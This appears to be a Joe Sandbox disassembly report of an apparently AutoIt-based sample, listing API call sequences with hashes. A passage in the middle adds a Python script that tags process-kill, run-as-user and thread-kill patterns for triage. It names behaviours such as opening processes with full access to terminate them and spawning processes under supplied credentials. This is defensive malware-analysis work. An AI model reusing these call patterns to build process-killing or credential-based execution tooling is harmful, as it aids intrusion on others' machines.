                                                                                                          • Instruction Fuzzy Hash: 6731A172509315AFD724DF54E849F9BB7EAFBC8314F00191AF595A7191CA30E908CB92
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E98CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E98CDE
                                                                                                            • Part of subcall function 00E98CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E98CE8
                                                                                                            • Part of subcall function 00E98CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E98CF7
                                                                                                            • Part of subcall function 00E98CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E98CFE
                                                                                                            • Part of subcall function 00E98CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E98D14
                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00E9904D), ref: 00E99482
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E9948E
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00E99495
                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E994AE
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00E9904D), ref: 00E994C2
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E994C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                          • String ID:
                                                                                                          • API String ID: 3008561057-0
                                                                                                          • Opcode ID: 77f908ab56c182f2a977c9b86b98fe2d3c39e0b15ef0f3cbc8cdb9f9d5ded8a9
                                                                                                          • Instruction ID: 96bfe0362364d122b9d6b2787469769fb98e573055068c5805c7b77ed87ebe5f
                                                                                                          • Opcode Fuzzy Hash: 77f908ab56c182f2a977c9b86b98fe2d3c39e0b15ef0f3cbc8cdb9f9d5ded8a9
                                                                                                          • Instruction Fuzzy Hash: 1611DF31502204FFDF128FA9DC49BAE7BA9EB41316F14841DE851E3211C7369905CB60
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E99200
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00E99207
                                                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E99216
                                                                                                          • CloseHandle.KERNEL32(00000004), ref: 00E99221
                                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E99250
                                                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E99264
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                          • String ID:
                                                                                                          • API String ID: 1413079979-0
                                                                                                          • Opcode ID: fa3a20c4d76540e8261d446ece8ad807e29a2f9c2c3d844a9a0a553c2495ac98
                                                                                                          • Instruction ID: ae99f4d077fbce49d9d457c6f684d81ce9706c6fbc6c0bf7ce72d105fa59524f
                                                                                                          • Opcode Fuzzy Hash: fa3a20c4d76540e8261d446ece8ad807e29a2f9c2c3d844a9a0a553c2495ac98
                                                                                                          • Instruction Fuzzy Hash: 99114A7250220ABFDF018F99ED49BDE7BA9EB08308F08401AFA04B2161D2719D64DB60
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 00E9C34E
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E9C35F
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E9C366
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E9C36E
                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E9C385
                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00E9C397
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1035833867-0
                                                                                                          • Opcode ID: 98e02f3c6abce611755ae51a6e858a62f17d15ebfad7c0e17fbbaccbb1d81998
                                                                                                          • Instruction ID: 5bdf20cddfa18b7a377e09e4a6651ea4c46fc59506e69911848233e0650d0fab
                                                                                                          • Opcode Fuzzy Hash: 98e02f3c6abce611755ae51a6e858a62f17d15ebfad7c0e17fbbaccbb1d81998
                                                                                                          • Instruction Fuzzy Hash: 9C014475E01218BFEF109BA69D49B5EBFB8EB48751F1440A6FA04BB280D6709D14CFA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E416CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E41729
                                                                                                            • Part of subcall function 00E416CF: SelectObject.GDI32(?,00000000), ref: 00E41738
                                                                                                            • Part of subcall function 00E416CF: BeginPath.GDI32(?), ref: 00E4174F
                                                                                                            • Part of subcall function 00E416CF: SelectObject.GDI32(?,00000000), ref: 00E41778
                                                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00ECC57C
                                                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 00ECC590
                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00ECC59E
                                                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 00ECC5AE
                                                                                                          • EndPath.GDI32(00000000), ref: 00ECC5BE
                                                                                                          • StrokePath.GDI32(00000000), ref: 00ECC5CE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 43455801-0
                                                                                                          • Opcode ID: 9189e624a5e6267444b7cca4ba6ee1d5abf103c2e7bb774cba97ae8e3ad09645
                                                                                                          • Instruction ID: 4dc56bc222b27a9acfdbe81d52946c5932b7701c39734c220eb5c82b6a65b04c
                                                                                                          • Opcode Fuzzy Hash: 9189e624a5e6267444b7cca4ba6ee1d5abf103c2e7bb774cba97ae8e3ad09645
                                                                                                          • Instruction Fuzzy Hash: 49111E7240110DBFDF029F91EC48FDA7FADEB08354F048456F95866160D771AE59DBA0
                                                                                                          APIs
                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E607EC
                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E607F4
                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E607FF
                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E6080A
                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E60812
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E6081A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4278518827-0
                                                                                                          • Opcode ID: b016447f9620b85439d9d29d63a2bf78cdc0e4e82a2f6ebc865670ed4bfeb9b4
                                                                                                          • Instruction ID: 14fab7df263675a5797b96535fad26af5ad330b6da0e59ecb752a3c64f2367ae
                                                                                                          • Opcode Fuzzy Hash: b016447f9620b85439d9d29d63a2bf78cdc0e4e82a2f6ebc865670ed4bfeb9b4
                                                                                                          • Instruction Fuzzy Hash: C3016CB09027597DE3008F5A8C85B52FFA8FF59354F04411BA15C4B941C7F5A868CBE5
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EA59B4
                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EA59CA
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00EA59D9
                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59E8
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59F2
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 839392675-0
                                                                                                          • Opcode ID: 4a598efe76262f8af9393b4afef1200130c93609cba1d9d83b055224b057524a
                                                                                                          • Instruction ID: cb790e7d883f1fc2db69cd6d6003b228aad09a9a939f40f33bb94a7566f15697
                                                                                                          • Opcode Fuzzy Hash: 4a598efe76262f8af9393b4afef1200130c93609cba1d9d83b055224b057524a
                                                                                                          • Instruction Fuzzy Hash: D8F01D32242158BFE7215B93AC0DFEF7B7CEBCBB11F04015AFA15A1050D7A05A1586B5
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00EA77FE
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00E4C2B6,?,?), ref: 00EA780F
                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00E4C2B6,?,?), ref: 00EA781C
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E4C2B6,?,?), ref: 00EA7829
                                                                                                            • Part of subcall function 00EA71F0: CloseHandle.KERNEL32(00000000,?,00EA7836,?,00E4C2B6,?,?), ref: 00EA71FA
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA783C
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00E4C2B6,?,?), ref: 00EA7843
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3495660284-0
                                                                                                          • Opcode ID: 71c9dd50b19dcabed36788d9cf118fbe7cf481cc5117915d5220573a72d2955b
                                                                                                          • Instruction ID: 004d8204dabb2844a8e0a972c95a36c810d4262578ae341e63f4f7fa6c0bf97a
                                                                                                          • Opcode Fuzzy Hash: 71c9dd50b19dcabed36788d9cf118fbe7cf481cc5117915d5220573a72d2955b
                                                                                                          • Instruction Fuzzy Hash: EDF05E32147212AFD7112B65FC8CBAB7769FF4A302F581422F102B50B2CBB56849CB60
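Three of the functions listed above carry call sequences an analyst would want pulled out of a listing like this automatically: the routine at 00EA59B4 sends message 0x10 (WM_CLOSE) to a window, opens the owning process with 0x1F0FFF (PROCESS_ALL_ACCESS) and calls TerminateProcess; the routine at 00E99200 builds an environment block and calls CreateProcessWithLogonW, i.e. spawns a process under supplied credentials; the routine at 00EA77FE calls TerminateThread. The Python script below is an added example and is not part of the Joe Sandbox report or of the sample: it parses the report's "APIs" bullet format (including the "Part of subcall function" lines) into call records, decodes the hex arguments, and tags each function with a simple ordered-sequence heuristic. The tag names (kill_by_window, run_as_user, thread_kill) and the ordering rule are my own choices; the three sample blocks embedded in the script are copied from the listing above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Win32 values the heuristics compare against, named as in the SDK headers.
WM_CLOSE = 0x0010
PROCESS_ALL_ACCESS = 0x1F0FFF

# Three "APIs" blocks copied from the function listing above. "Memory Dump Source"
# is kept because that line is what closes a block in the report.
SAMPLE = """\
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EA59B4
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EA59CA
• GetWindowThreadProcessId.USER32(?,?), ref: 00EA59D9
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59E8
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59F2
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59F9
Memory Dump Source
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E99200
• OpenProcessToken.ADVAPI32(00000000), ref: 00E99207
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E99216
• CloseHandle.KERNEL32(00000004), ref: 00E99221
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E99250
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00E99264
Memory Dump Source
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00EA77FE
• EnterCriticalSection.KERNEL32(?,?,00E4C2B6,?,?), ref: 00EA780F
• TerminateThread.KERNEL32(00000000,000001F6,?,00E4C2B6,?,?), ref: 00EA781C
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E4C2B6,?,?), ref: 00EA7829
  • Part of subcall function 00EA71F0: CloseHandle.KERNEL32(00000000,?,00EA7836,?,00E4C2B6,?,?), ref: 00EA71FA
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA783C
• LeaveCriticalSection.KERNEL32(?,?,00E4C2B6,?,?), ref: 00EA7843
Memory Dump Source
"""

# One bullet: optional "Part of subcall function XXXXXXXX:", then Api.MODULE(args), ref: ADDR
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list              # int where the sandbox recovered the value, None for "?"
    ref: str                # address of the call site
    subcall: Optional[str]  # callee address when listed under "Part of subcall function"

def _arg(token: str) -> Optional[int]:
    """'001F0FFF' -> 0x1F0FFF, '-00000002' -> -2, '?' -> None."""
    token = token.strip()
    return int(token, 16) if re.fullmatch(r"-?[0-9A-F]{8}", token) else None

def parse_blocks(text: str) -> list:
    """Split the listing into functions: a block runs from 'APIs' to 'Memory Dump Source'."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
        elif stripped == "Memory Dump Source" and current is not None:
            blocks.append(current)
            current = None
        elif current is not None and (m := CALL_RE.match(line)):
            args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
            current.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return blocks

def classify(calls: list) -> set:
    """Tag a function by its call sequence; only direct calls take part in the ordering."""
    direct = [c for c in calls if c.subcall is None]
    names = [c.api for c in direct]
    tags = set()
    # WM_CLOSE to the window, then OpenProcess(PROCESS_ALL_ACCESS) on its owner, then TerminateProcess.
    close_at = [i for i, c in enumerate(direct)
                if c.api in ("PostMessageW", "SendMessageTimeoutW") and c.args[1:2] == [WM_CLOSE]]
    open_at = [i for i, c in enumerate(direct)
               if c.api == "OpenProcess" and c.args[:1] == [PROCESS_ALL_ACCESS]]
    if close_at and open_at and "TerminateProcess" in names:
        if close_at[0] < open_at[0] < names.index("TerminateProcess"):
            tags.add("kill_by_window")
    # Process creation under explicit credentials (run-as).
    if "CreateProcessWithLogonW" in names:
        tags.add("run_as_user")
    # Forced thread termination.
    if "TerminateThread" in names:
        tags.add("thread_kill")
    return tags

def triage(text: str) -> list:
    """(address of the function's first listed call, sorted tags) for every tagged function."""
    result = []
    for calls in parse_blocks(text):
        tags = classify(calls)
        if tags:
            result.append((calls[0].ref, sorted(tags)))
    return result
```

`triage(SAMPLE)` returns the three call sites with their tags. The ordering check on the kill pattern is deliberate: a function that merely has TerminateProcess somewhere near an unrelated WM_CLOSE would otherwise be tagged, and in this listing the sandbox's argument columns are only reliable for the first few positions, so the heuristic looks at the message id and the access mask and nothing further down the argument list. Calls listed under "Part of subcall function" are kept in the record but excluded from ordering, since they belong to the callee.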
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E99555
                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00E99561
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E9956A
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E99572
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E9957B
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E99582
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 146765662-0
                                                                                                          • Opcode ID: 04bff89d7e42bcedcdd9810dc2a1c7d51cfb4f89294651e7c5c4236831abfda7
                                                                                                          • Instruction ID: eaf97eab9aa6fb62634ddc9cdaa76b248c9858168868349f052f154fdb3becd5
                                                                                                          • Opcode Fuzzy Hash: 04bff89d7e42bcedcdd9810dc2a1c7d51cfb4f89294651e7c5c4236831abfda7
                                                                                                          • Instruction Fuzzy Hash: C9E0C236106101BFDA012BE2FC0CA5ABB29FB89722B584222F215A1070CB32A468DB50
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB8CFD
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EB8E0C
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB8F84
                                                                                                            • Part of subcall function 00EA7B1D: VariantInit.OLEAUT32(00000000), ref: 00EA7B5D
                                                                                                            • Part of subcall function 00EA7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00EA7B66
                                                                                                            • Part of subcall function 00EA7B1D: VariantClear.OLEAUT32(00000000), ref: 00EA7B72
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                          • Opcode ID: 82aad3103196e9a958d2e5d2d31e9753698c9261ae66fab43f1ab952a12acab7
                                                                                                          • Instruction ID: 68fe8cfb48d2b31df18dcc44a5e5dcd9da4d72e64d5f09342f03227e6290c961
                                                                                                          • Opcode Fuzzy Hash: 82aad3103196e9a958d2e5d2d31e9753698c9261ae66fab43f1ab952a12acab7
                                                                                                          • Instruction Fuzzy Hash: E69190746043019FC700DF24C5809ABB7F9EF89354F14996EF999AB3A1DB31E905CB51
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E5436A: _wcscpy.LIBCMT ref: 00E5438D
                                                                                                          • _memset.LIBCMT ref: 00EA332E
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EA335D
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EA3410
                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EA343E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 4152858687-4108050209
                                                                                                          • Opcode ID: f063da0a3c2c51d429a23c8f35709821edcd311d6935e1bac94935b042a36d1a
                                                                                                          • Instruction ID: 5a873a7d8621f78346d19940b93145c3a8a0d7a1156c28d52c114566ca4e85e7
                                                                                                          • Opcode Fuzzy Hash: f063da0a3c2c51d429a23c8f35709821edcd311d6935e1bac94935b042a36d1a
                                                                                                          • Instruction Fuzzy Hash: E251D4316083009BD7159E38D84576BBBE4AF4E358F14292DF8A1BB1E1DB20EE48C752
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EA2F67
                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EA2F83
                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00EA2FC9
                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F07890,00000000), ref: 00EA3012
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1173514356-4108050209
                                                                                                          • Opcode ID: 4e535f772036f2b255908d5ef90e7cf7c008a5c944a43afbe7b9bd6e22bca41f
                                                                                                          • Instruction ID: 161a5b47102dee38427758318bfe7d357ad47dfebd0832daecc3e2c3f76b4b7a
                                                                                                          • Opcode Fuzzy Hash: 4e535f772036f2b255908d5ef90e7cf7c008a5c944a43afbe7b9bd6e22bca41f
                                                                                                          • Instruction Fuzzy Hash: 8341B1312043419FD720DF28D884B5ABBE4AF8A314F145A1EF966BB291D770FA05CB66
                                                                                                          APIs
